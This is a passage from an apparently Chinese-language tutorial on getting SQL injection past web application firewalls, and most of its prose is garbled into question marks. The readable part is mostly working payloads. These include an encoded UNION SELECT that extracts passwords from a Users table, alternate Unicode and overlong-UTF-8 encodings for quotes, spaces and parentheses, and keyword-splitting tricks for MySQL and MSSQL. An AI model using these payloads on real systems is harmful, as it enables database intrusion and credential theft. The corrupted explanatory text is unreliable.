????6>Character????
??????Щ????£?WAF????ó????е???????н?????????ЩWAF????????????ε?????????????bypass???????????????????????(WAF??????????????????SQL???????????????????~)
??????????bypass????????
id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+
?????Щ???????????
Single quote ':
%u0027
%u02b9
%u02bc
%u02c8
%u2032
%uff07
%c0%27
%c0%a7
%e0%80%a7
Space:
%u0020
%uff00
%c0%20
%c0%a0
%e0%80%a0
Left parenthesis (:
%u0028
%uff08
%c0%28
%c0%a8
%e0%80%a8
Right parenthesis ):
%u0029
%uff09
%c0%29
%c0%a9
%e0%80%a9

????7>????
???????????????WAF???????????????????????~???????????????????????WAF??
????7a>???SQL???
?????????????????????SQL??????????????????????????????????????磬????????????union+select????????????403?????????????????union?????????????????????Щ???????????Fuzzing?????????????bypass???????
????7b>?????????
?????????sql???????????????????????????????????????????????php?и???????е?????????????aspx???????????????????????
????????????????????
id=1+Select+1,2,3--
??????????????′???
Error at line 1 near " "+1,2,3--
??????????????????????????????????????·???????????
sel%0bect+1,2,3
????????????????????????WAF????????bypass?·??
????8>???bypass?????
????????????????????????????????WAF???????????????????????о??????????????????? :b  ??????????????????????WAF????????????????????????£????????????????????????????????????????????????????????Щ??????????inflatable doll?? [;:{}()*&$/|<>?"'] ???????????Щ?????????????????????~???????????????????????????????????
??????????????????N???????tm??????????????????????????????????????????????????????С???????????????WAF???????????copy????????????????????????????????????£???????????
?????????????????????????????????е?*???????????????ζ???????????????????union+select???????????403??????????????£?????ó??????*???滻?????
id=1+uni*on+sel*ect+1,2,3--+
?????????????*??????????????union+select??????????????????????WAF bypass????????????????union+select??????????????????????????????????????滻????????????????????????????
?????Щ??????bypass??
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT' <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
?????????mysql4.0???UNI /**/ON+SEL/**/ ECT?????????
????????WAF??????????????????????????о???WAF bypass????????????????????????????????????pm???